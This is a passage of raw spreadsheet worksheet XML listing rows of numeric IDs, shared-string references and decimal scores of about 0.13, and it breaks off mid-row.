    <row r="19832" ht="15.75" customHeight="1">
      <c r="A19832" s="1">
        <v>8015.0</v>
      </c>
      <c r="B19832" s="2">
        <v>5.2792398E7</v>
      </c>
      <c r="C19832" s="2" t="s">
        <v>19118</v>
      </c>
      <c r="D19832" s="2">
        <v>1.0</v>
      </c>
      <c r="E19832" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19832" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="19833" ht="15.75" customHeight="1">
      <c r="A19833" s="1">
        <v>9714.0</v>
      </c>
      <c r="B19833" s="2">
        <v>5.6399079E7</v>
      </c>
      <c r="C19833" s="2" t="s">
        <v>19119</v>
      </c>
      <c r="D19833" s="2">
        <v>1.0</v>
      </c>
      <c r="E19833" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19833" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="19834" ht="15.75" customHeight="1">
      <c r="A19834" s="1">
        <v>12048.0</v>
      </c>
      <c r="B19834" s="2">
        <v>2.6362399E7</v>
      </c>
      <c r="C19834" s="2" t="s">
        <v>19120</v>
      </c>
      <c r="D19834" s="2">
        <v>1.0</v>
      </c>
      <c r="E19834" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19834" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="19835" ht="15.75" customHeight="1">
      <c r="A19835" s="1">
        <v>13484.0</v>
      </c>
      <c r="B19835" s="2">
        <v>3.5340709E7</v>
      </c>
      <c r="C19835" s="2" t="s">
        <v>19121</v>
      </c>
      <c r="D19835" s="2">
        <v>1.0</v>
      </c>
      <c r="E19835" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19835" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="19836" ht="15.75" customHeight="1">
      <c r="A19836" s="1">
        <v>15982.0</v>
      </c>
      <c r="B19836" s="2">
        <v>4.4910434E7</v>
      </c>
      <c r="C19836" s="2" t="s">
        <v>19122</v>
      </c>
      <c r="D19836" s="2">
        <v>1.0</v>
      </c>
      <c r="E19836" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19836" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="19837" ht="15.75" customHeight="1">
      <c r="A19837" s="1">
        <v>16047.0</v>
      </c>
      <c r="B19837" s="2">
        <v>4.5204344E7</v>
      </c>
      <c r="C19837" s="2" t="s">
        <v>19123</v>
      </c>
      <c r="D19837" s="2">
        <v>1.0</v>
      </c>
      <c r="E19837" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19837" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="19838" ht="15.75" customHeight="1">
      <c r="A19838" s="1">
        <v>17029.0</v>
      </c>
      <c r="B19838" s="2">
        <v>4.8480787E7</v>
      </c>
      <c r="C19838" s="2" t="s">
        <v>19124</v>
      </c>
      <c r="D19838" s="2">
        <v>1.0</v>
      </c>
      <c r="E19838" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19838" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="19839" ht="15.75" customHeight="1">
      <c r="A19839" s="1">
        <v>18011.0</v>
      </c>
      <c r="B19839" s="2">
        <v>5.1477148E7</v>
      </c>
      <c r="C19839" s="2" t="s">
        <v>19125</v>
      </c>
      <c r="D19839" s="2">
        <v>1.0</v>
      </c>
      <c r="E19839" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19839" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="19840" ht="15.75" customHeight="1">
      <c r="A19840" s="1">
        <v>26796.0</v>
      </c>
      <c r="B19840" s="2">
        <v>1.8625289E7</v>
      </c>
      <c r="C19840" s="2" t="s">
        <v>19126</v>
      </c>
      <c r="D19840" s="2">
        <v>1.0</v>
      </c>
      <c r="E19840" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19840" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="19841" ht="15.75" customHeight="1">
      <c r="A19841" s="1">
        <v>32411.0</v>
      </c>
      <c r="B19841" s="2">
        <v>5638706.0</v>
      </c>
      <c r="C19841" s="2" t="s">
        <v>19127</v>
      </c>
      <c r="D19841" s="2">
        <v>1.0</v>
      </c>
      <c r="E19841" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19841" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="19842" ht="15.75" customHeight="1">
      <c r="A19842" s="1">
        <v>32328.0</v>
      </c>
      <c r="B19842" s="2">
        <v>5.5773376E7</v>
      </c>
      <c r="C19842" s="2" t="s">
        <v>19128</v>
      </c>
      <c r="D19842" s="2">
        <v>1.0</v>
      </c>
      <c r="E19842" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19842" s="2">
        <v>0.133879781420765</v>
      </c>
    </row>
    <row r="19843" ht="15.75" customHeight="1">
      <c r="A19843" s="1">
        <v>929.0</v>
      </c>
      <c r="B19843" s="2">
        <v>2.2353134E7</v>
      </c>
      <c r="C19843" s="2" t="s">
        <v>19129</v>
      </c>
      <c r="D19843" s="2">
        <v>1.0</v>
      </c>
      <c r="E19843" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19843" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="19844" ht="15.75" customHeight="1">
      <c r="A19844" s="1">
        <v>10398.0</v>
      </c>
      <c r="B19844" s="2">
        <v>9228486.0</v>
      </c>
      <c r="C19844" s="2" t="s">
        <v>19130</v>
      </c>
      <c r="D19844" s="2">
        <v>1.0</v>
      </c>
      <c r="E19844" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19844" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="19845" ht="15.75" customHeight="1">
      <c r="A19845" s="1">
        <v>12243.0</v>
      </c>
      <c r="B19845" s="2">
        <v>2.7886201E7</v>
      </c>
      <c r="C19845" s="2" t="s">
        <v>19131</v>
      </c>
      <c r="D19845" s="2">
        <v>1.0</v>
      </c>
      <c r="E19845" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19845" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="19846" ht="15.75" customHeight="1">
      <c r="A19846" s="1">
        <v>19154.0</v>
      </c>
      <c r="B19846" s="2">
        <v>5.4874537E7</v>
      </c>
      <c r="C19846" s="2" t="s">
        <v>19132</v>
      </c>
      <c r="D19846" s="2">
        <v>1.0</v>
      </c>
      <c r="E19846" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19846" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="19847" ht="15.75" customHeight="1">
      <c r="A19847" s="1">
        <v>18302.0</v>
      </c>
      <c r="B19847" s="2">
        <v>5.2343546E7</v>
      </c>
      <c r="C19847" s="2" t="s">
        <v>19133</v>
      </c>
      <c r="D19847" s="2">
        <v>1.0</v>
      </c>
      <c r="E19847" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19847" s="2">
        <v>0.1331417624521072</v>
      </c>
    </row>
    <row r="19848" ht="15.75" customHeight="1">
      <c r="A19848" s="1">
        <v>252.0</v>
      </c>
      <c r="B19848" s="2">
        <v>1.5039334E7</v>
      </c>
      <c r="C19848" s="2" t="s">
        <v>19134</v>
      </c>
      <c r="D19848" s="2">
        <v>1.0</v>
      </c>
      <c r="E19848" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19848" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="19849" ht="15.75" customHeight="1">
      <c r="A19849" s="1">
        <v>467.0</v>
      </c>
      <c r="B19849" s="2">
        <v>1.7350885E7</v>
      </c>
      <c r="C19849" s="2" t="s">
        <v>19135</v>
      </c>
      <c r="D19849" s="2">
        <v>1.0</v>
      </c>
      <c r="E19849" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19849" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="19850" ht="15.75" customHeight="1">
      <c r="A19850" s="1">
        <v>9206.0</v>
      </c>
      <c r="B19850" s="2">
        <v>5.5409526E7</v>
      </c>
      <c r="C19850" s="2" t="s">
        <v>19136</v>
      </c>
      <c r="D19850" s="2">
        <v>1.0</v>
      </c>
      <c r="E19850" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19850" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="19851" ht="15.75" customHeight="1">
      <c r="A19851" s="1">
        <v>3922.0</v>
      </c>
      <c r="B19851" s="2">
        <v>4.0558374E7</v>
      </c>
      <c r="C19851" s="2" t="s">
        <v>19137</v>
      </c>
      <c r="D19851" s="2">
        <v>1.0</v>
      </c>
      <c r="E19851" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19851" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19852" ht="15.75" customHeight="1">
      <c r="A19852" s="1">
        <v>4401.0</v>
      </c>
      <c r="B19852" s="2">
        <v>4.227336E7</v>
      </c>
      <c r="C19852" s="2" t="s">
        <v>19138</v>
      </c>
      <c r="D19852" s="2">
        <v>1.0</v>
      </c>
      <c r="E19852" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19852" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19853" ht="15.75" customHeight="1">
      <c r="A19853" s="1">
        <v>4993.0</v>
      </c>
      <c r="B19853" s="2">
        <v>4.4163796E7</v>
      </c>
      <c r="C19853" s="2" t="s">
        <v>19139</v>
      </c>
      <c r="D19853" s="2">
        <v>1.0</v>
      </c>
      <c r="E19853" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19853" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19854" ht="15.75" customHeight="1">
      <c r="A19854" s="1">
        <v>8443.0</v>
      </c>
      <c r="B19854" s="2">
        <v>5.3958839E7</v>
      </c>
      <c r="C19854" s="2" t="s">
        <v>19140</v>
      </c>
      <c r="D19854" s="2">
        <v>1.0</v>
      </c>
      <c r="E19854" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19854" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19855" ht="15.75" customHeight="1">
      <c r="A19855" s="1">
        <v>9978.0</v>
      </c>
      <c r="B19855" s="2">
        <v>5.6948231E7</v>
      </c>
      <c r="C19855" s="2" t="s">
        <v>19141</v>
      </c>
      <c r="D19855" s="2">
        <v>1.0</v>
      </c>
      <c r="E19855" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19855" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19856" ht="15.75" customHeight="1">
      <c r="A19856" s="1">
        <v>10123.0</v>
      </c>
      <c r="B19856" s="2">
        <v>5.7278782E7</v>
      </c>
      <c r="C19856" s="2" t="s">
        <v>19142</v>
      </c>
      <c r="D19856" s="2">
        <v>1.0</v>
      </c>
      <c r="E19856" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19856" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19857" ht="15.75" customHeight="1">
      <c r="A19857" s="1">
        <v>11468.0</v>
      </c>
      <c r="B19857" s="2">
        <v>2.195404E7</v>
      </c>
      <c r="C19857" s="2" t="s">
        <v>19143</v>
      </c>
      <c r="D19857" s="2">
        <v>1.0</v>
      </c>
      <c r="E19857" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19857" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19858" ht="15.75" customHeight="1">
      <c r="A19858" s="1">
        <v>13259.0</v>
      </c>
      <c r="B19858" s="2">
        <v>3.4312947E7</v>
      </c>
      <c r="C19858" s="2" t="s">
        <v>19144</v>
      </c>
      <c r="D19858" s="2">
        <v>1.0</v>
      </c>
      <c r="E19858" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19858" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19859" ht="15.75" customHeight="1">
      <c r="A19859" s="1">
        <v>14107.0</v>
      </c>
      <c r="B19859" s="2">
        <v>3.7763237E7</v>
      </c>
      <c r="C19859" s="2" t="s">
        <v>19145</v>
      </c>
      <c r="D19859" s="2">
        <v>1.0</v>
      </c>
      <c r="E19859" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19859" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19860" ht="15.75" customHeight="1">
      <c r="A19860" s="1">
        <v>14572.0</v>
      </c>
      <c r="B19860" s="2">
        <v>4.006753E7</v>
      </c>
      <c r="C19860" s="2" t="s">
        <v>19146</v>
      </c>
      <c r="D19860" s="2">
        <v>1.0</v>
      </c>
      <c r="E19860" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19860" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19861" ht="15.75" customHeight="1">
      <c r="A19861" s="1">
        <v>15881.0</v>
      </c>
      <c r="B19861" s="2">
        <v>4.4529507E7</v>
      </c>
      <c r="C19861" s="2" t="s">
        <v>19147</v>
      </c>
      <c r="D19861" s="2">
        <v>1.0</v>
      </c>
      <c r="E19861" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19861" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19862" ht="15.75" customHeight="1">
      <c r="A19862" s="1">
        <v>16635.0</v>
      </c>
      <c r="B19862" s="2">
        <v>4.7111448E7</v>
      </c>
      <c r="C19862" s="2" t="s">
        <v>19148</v>
      </c>
      <c r="D19862" s="2">
        <v>1.0</v>
      </c>
      <c r="E19862" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19862" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19863" ht="15.75" customHeight="1">
      <c r="A19863" s="1">
        <v>18359.0</v>
      </c>
      <c r="B19863" s="2">
        <v>5.2545124E7</v>
      </c>
      <c r="C19863" s="2" t="s">
        <v>19149</v>
      </c>
      <c r="D19863" s="2">
        <v>1.0</v>
      </c>
      <c r="E19863" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19863" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19864" ht="15.75" customHeight="1">
      <c r="A19864" s="1">
        <v>19703.0</v>
      </c>
      <c r="B19864" s="2">
        <v>5.6521773E7</v>
      </c>
      <c r="C19864" s="2" t="s">
        <v>19150</v>
      </c>
      <c r="D19864" s="2">
        <v>1.0</v>
      </c>
      <c r="E19864" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19864" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19865" ht="15.75" customHeight="1">
      <c r="A19865" s="1">
        <v>19776.0</v>
      </c>
      <c r="B19865" s="2">
        <v>5.6770457E7</v>
      </c>
      <c r="C19865" s="2" t="s">
        <v>19151</v>
      </c>
      <c r="D19865" s="2">
        <v>1.0</v>
      </c>
      <c r="E19865" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19865" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19866" ht="15.75" customHeight="1">
      <c r="A19866" s="1">
        <v>19975.0</v>
      </c>
      <c r="B19866" s="2">
        <v>5.7593951E7</v>
      </c>
      <c r="C19866" s="2" t="s">
        <v>19152</v>
      </c>
      <c r="D19866" s="2">
        <v>1.0</v>
      </c>
      <c r="E19866" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19866" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19867" ht="15.75" customHeight="1">
      <c r="A19867" s="1">
        <v>31904.0</v>
      </c>
      <c r="B19867" s="2">
        <v>5296419.0</v>
      </c>
      <c r="C19867" s="2" t="s">
        <v>19153</v>
      </c>
      <c r="D19867" s="2">
        <v>1.0</v>
      </c>
      <c r="E19867" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19867" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19868" ht="15.75" customHeight="1">
      <c r="A19868" s="1">
        <v>31927.0</v>
      </c>
      <c r="B19868" s="2">
        <v>5304814.0</v>
      </c>
      <c r="C19868" s="2" t="s">
        <v>19154</v>
      </c>
      <c r="D19868" s="2">
        <v>1.0</v>
      </c>
      <c r="E19868" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19868" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19869" ht="15.75" customHeight="1">
      <c r="A19869" s="1">
        <v>32804.0</v>
      </c>
      <c r="B19869" s="2">
        <v>6171391.0</v>
      </c>
      <c r="C19869" s="2" t="s">
        <v>19155</v>
      </c>
      <c r="D19869" s="2">
        <v>1.0</v>
      </c>
      <c r="E19869" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19869" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="19870" ht="15.75" customHeight="1">
      <c r="A19870" s="1">
        <v>7080.0</v>
      </c>
      <c r="B19870" s="2">
        <v>5.0265386E7</v>
      </c>
      <c r="C19870" s="2" t="s">
        <v>19156</v>
      </c>
      <c r="D19870" s="2">
        <v>1.0</v>
      </c>
      <c r="E19870" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19870" s="2">
        <v>0.1325396825396826</v>
      </c>
    </row>
    <row r="19871" ht="15.75" customHeight="1">
      <c r="A19871" s="1">
        <v>12052.0</v>
      </c>
      <c r="B19871" s="2">
        <v>2.6420861E7</v>
      </c>
      <c r="C19871" s="2" t="s">
        <v>19157</v>
      </c>
      <c r="D19871" s="2">
        <v>1.0</v>
      </c>
      <c r="E19871" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19871" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="19872" ht="15.75" customHeight="1">
      <c r="A19872" s="1">
        <v>17456.0</v>
      </c>
      <c r="B19872" s="2">
        <v>4.9843593E7</v>
      </c>
      <c r="C19872" s="2" t="s">
        <v>19158</v>
      </c>
      <c r="D19872" s="2">
        <v>1.0</v>
      </c>
      <c r="E19872" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19872" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="19873" ht="15.75" customHeight="1">
      <c r="A19873" s="1">
        <v>10349.0</v>
      </c>
      <c r="B19873" s="2">
        <v>646903.0</v>
      </c>
      <c r="C19873" s="2" t="s">
        <v>19159</v>
      </c>
      <c r="D19873" s="2">
        <v>1.0</v>
      </c>
      <c r="E19873" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19873" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="19874" ht="15.75" customHeight="1">
      <c r="A19874" s="1">
        <v>19916.0</v>
      </c>
      <c r="B19874" s="2">
        <v>5.7404484E7</v>
      </c>
      <c r="C19874" s="2" t="s">
        <v>19160</v>
      </c>
      <c r="D19874" s="2">
        <v>1.0</v>
      </c>
      <c r="E19874" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19874" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="19875" ht="15.75" customHeight="1">
      <c r="A19875" s="1">
        <v>5097.0</v>
      </c>
      <c r="B19875" s="2">
        <v>4.4509594E7</v>
      </c>
      <c r="C19875" s="2" t="s">
        <v>19161</v>
      </c>
      <c r="D19875" s="2">
        <v>1.0</v>
      </c>
      <c r="E19875" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19875" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="19876" ht="15.75" customHeight="1">
      <c r="A19876" s="1">
        <v>5975.0</v>
      </c>
      <c r="B19876" s="2">
        <v>4.7374333E7</v>
      </c>
      <c r="C19876" s="2" t="s">
        <v>19162</v>
      </c>
      <c r="D19876" s="2">
        <v>1.0</v>
      </c>
      <c r="E19876" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19876" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="19877" ht="15.75" customHeight="1">
      <c r="A19877" s="1">
        <v>11903.0</v>
      </c>
      <c r="B19877" s="2">
        <v>2.5197303E7</v>
      </c>
      <c r="C19877" s="2" t="s">
        <v>19163</v>
      </c>
      <c r="D19877" s="2">
        <v>1.0</v>
      </c>
      <c r="E19877" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19877" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="19878" ht="15.75" customHeight="1">
      <c r="A19878" s="1">
        <v>19925.0</v>
      </c>
      <c r="B19878" s="2">
        <v>5.7432739E7</v>
      </c>
      <c r="C19878" s="2" t="s">
        <v>19164</v>
      </c>
      <c r="D19878" s="2">
        <v>1.0</v>
      </c>
      <c r="E19878" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19878" s="2">
        <v>0.1318407960199005</v>
      </c>
    </row>
    <row r="19879" ht="15.75" customHeight="1">
      <c r="A19879" s="1">
        <v>3266.0</v>
      </c>
      <c r="B19879" s="2">
        <v>3.7464634E7</v>
      </c>
      <c r="C19879" s="2" t="s">
        <v>19165</v>
      </c>
      <c r="D19879" s="2">
        <v>1.0</v>
      </c>
      <c r="E19879" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19879" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="19880" ht="15.75" customHeight="1">
      <c r="A19880" s="1">
        <v>12300.0</v>
      </c>
      <c r="B19880" s="2">
        <v>2.8315791E7</v>
      </c>
      <c r="C19880" s="2" t="s">
        <v>19166</v>
      </c>
      <c r="D19880" s="2">
        <v>1.0</v>
      </c>
      <c r="E19880" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19880" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="19881" ht="15.75" customHeight="1">
      <c r="A19881" s="1">
        <v>18365.0</v>
      </c>
      <c r="B19881" s="2">
        <v>5256916.0</v>
      </c>
      <c r="C19881" s="2" t="s">
        <v>19167</v>
      </c>
      <c r="D19881" s="2">
        <v>1.0</v>
      </c>
      <c r="E19881" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19881" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="19882" ht="15.75" customHeight="1">
      <c r="A19882" s="1">
        <v>1284.0</v>
      </c>
      <c r="B19882" s="2">
        <v>2.55597E7</v>
      </c>
      <c r="C19882" s="2" t="s">
        <v>19168</v>
      </c>
      <c r="D19882" s="2">
        <v>1.0</v>
      </c>
      <c r="E19882" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19882" s="2">
        <v>0.1317103620474408</v>
      </c>
    </row>
    <row r="19883" ht="15.75" customHeight="1">
      <c r="A19883" s="1">
        <v>1832.0</v>
      </c>
      <c r="B19883" s="2">
        <v>2.933674E7</v>
      </c>
      <c r="C19883" s="2" t="s">
        <v>19169</v>
      </c>
      <c r="D19883" s="2">
        <v>1.0</v>
      </c>
      <c r="E19883" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19883" s="2">
        <v>0.131578947368421</v>
      </c>
    </row>
    <row r="19884" ht="15.75" customHeight="1">
      <c r="A19884" s="1">
        <v>6484.0</v>
      </c>
      <c r="B19884" s="2">
        <v>4.8671664E7</v>
      </c>
      <c r="C19884" s="2" t="s">
        <v>19170</v>
      </c>
      <c r="D19884" s="2">
        <v>1.0</v>
      </c>
      <c r="E19884" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19884" s="2">
        <v>0.1313932980599647</v>
      </c>
    </row>
    <row r="19885" ht="15.75" customHeight="1">
      <c r="A19885" s="1">
        <v>8529.0</v>
      </c>
      <c r="B19885" s="2">
        <v>5.409698E7</v>
      </c>
      <c r="C19885" s="2" t="s">
        <v>19171</v>
      </c>
      <c r="D19885" s="2">
        <v>1.0</v>
      </c>
      <c r="E19885" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19885" s="2">
        <v>0.1312399355877617</v>
      </c>
    </row>
    <row r="19886" ht="15.75" customHeight="1">
      <c r="A19886" s="1">
        <v>15636.0</v>
      </c>
      <c r="B19886" s="2">
        <v>4.3579749E7</v>
      </c>
      <c r="C19886" s="2" t="s">
        <v>19172</v>
      </c>
      <c r="D19886" s="2">
        <v>1.0</v>
      </c>
      <c r="E19886" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19886" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="19887" ht="15.75" customHeight="1">
      <c r="A19887" s="1">
        <v>3186.0</v>
      </c>
      <c r="B19887" s="2">
        <v>3.7168822E7</v>
      </c>
      <c r="C19887" s="2" t="s">
        <v>19173</v>
      </c>
      <c r="D19887" s="2">
        <v>1.0</v>
      </c>
      <c r="E19887" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19887" s="2">
        <v>0.1311111111111112</v>
      </c>
    </row>
    <row r="19888" ht="15.75" customHeight="1">
      <c r="A19888" s="1">
        <v>1357.0</v>
      </c>
      <c r="B19888" s="2">
        <v>2.5970903E7</v>
      </c>
      <c r="C19888" s="2" t="s">
        <v>19174</v>
      </c>
      <c r="D19888" s="2">
        <v>1.0</v>
      </c>
      <c r="E19888" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19888" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="19889" ht="15.75" customHeight="1">
      <c r="A19889" s="1">
        <v>12661.0</v>
      </c>
      <c r="B19889" s="2">
        <v>3.0520451E7</v>
      </c>
      <c r="C19889" s="2" t="s">
        <v>19175</v>
      </c>
      <c r="D19889" s="2">
        <v>1.0</v>
      </c>
      <c r="E19889" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19889" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="19890" ht="15.75" customHeight="1">
      <c r="A19890" s="1">
        <v>220.0</v>
      </c>
      <c r="B19890" s="2">
        <v>1.4655122E7</v>
      </c>
      <c r="C19890" s="2" t="s">
        <v>19176</v>
      </c>
      <c r="D19890" s="2">
        <v>1.0</v>
      </c>
      <c r="E19890" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19890" s="2">
        <v>0.130952380952381</v>
      </c>
    </row>
    <row r="19891" ht="15.75" customHeight="1">
      <c r="A19891" s="1">
        <v>2917.0</v>
      </c>
      <c r="B19891" s="2">
        <v>3.583437E7</v>
      </c>
      <c r="C19891" s="2" t="s">
        <v>19177</v>
      </c>
      <c r="D19891" s="2">
        <v>1.0</v>
      </c>
      <c r="E19891" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19891" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="19892" ht="15.75" customHeight="1">
      <c r="A19892" s="1">
        <v>1020.0</v>
      </c>
      <c r="B19892" s="2">
        <v>2.31655E7</v>
      </c>
      <c r="C19892" s="2" t="s">
        <v>19178</v>
      </c>
      <c r="D19892" s="2">
        <v>1.0</v>
      </c>
      <c r="E19892" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19892" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="19893" ht="15.75" customHeight="1">
      <c r="A19893" s="1">
        <v>5718.0</v>
      </c>
      <c r="B19893" s="2">
        <v>4.6589294E7</v>
      </c>
      <c r="C19893" s="2" t="s">
        <v>19179</v>
      </c>
      <c r="D19893" s="2">
        <v>1.0</v>
      </c>
      <c r="E19893" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19893" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="19894" ht="15.75" customHeight="1">
      <c r="A19894" s="1">
        <v>5420.0</v>
      </c>
      <c r="B19894" s="2">
        <v>4.5558289E7</v>
      </c>
      <c r="C19894" s="2" t="s">
        <v>19180</v>
      </c>
      <c r="D19894" s="2">
        <v>1.0</v>
      </c>
      <c r="E19894" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19894" s="2">
        <v>0.1306584362139917</v>
      </c>
    </row>
    <row r="19895" ht="15.75" customHeight="1">
      <c r="A19895" s="1">
        <v>14292.0</v>
      </c>
      <c r="B19895" s="2">
        <v>3.8509235E7</v>
      </c>
      <c r="C19895" s="2" t="s">
        <v>19181</v>
      </c>
      <c r="D19895" s="2">
        <v>1.0</v>
      </c>
      <c r="E19895" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19895" s="2">
        <v>0.1306584362139917</v>
      </c>
    </row>
    <row r="19896" ht="15.75" customHeight="1">
      <c r="A19896" s="1">
        <v>15121.0</v>
      </c>
      <c r="B19896" s="2">
        <v>4.188398E7</v>
      </c>
      <c r="C19896" s="2" t="s">
        <v>19182</v>
      </c>
      <c r="D19896" s="2">
        <v>1.0</v>
      </c>
      <c r="E19896" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19896" s="2">
        <v>0.1306584362139917</v>
      </c>
    </row>
    <row r="19897" ht="15.75" customHeight="1">
      <c r="A19897" s="1">
        <v>15480.0</v>
      </c>
      <c r="B19897" s="2">
        <v>4.3177268E7</v>
      </c>
      <c r="C19897" s="2" t="s">
        <v>19183</v>
      </c>
      <c r="D19897" s="2">
        <v>1.0</v>
      </c>
      <c r="E19897" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19897" s="2">
        <v>0.1306584362139917</v>
      </c>
    </row>
    <row r="19898" ht="15.75" customHeight="1">
      <c r="A19898" s="1">
        <v>16716.0</v>
      </c>
      <c r="B19898" s="2">
        <v>4.7449303E7</v>
      </c>
      <c r="C19898" s="2" t="s">
        <v>19184</v>
      </c>
      <c r="D19898" s="2">
        <v>1.0</v>
      </c>
      <c r="E19898" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19898" s="2">
        <v>0.1306584362139917</v>
      </c>
    </row>
    <row r="19899" ht="15.75" customHeight="1">
      <c r="A19899" s="1">
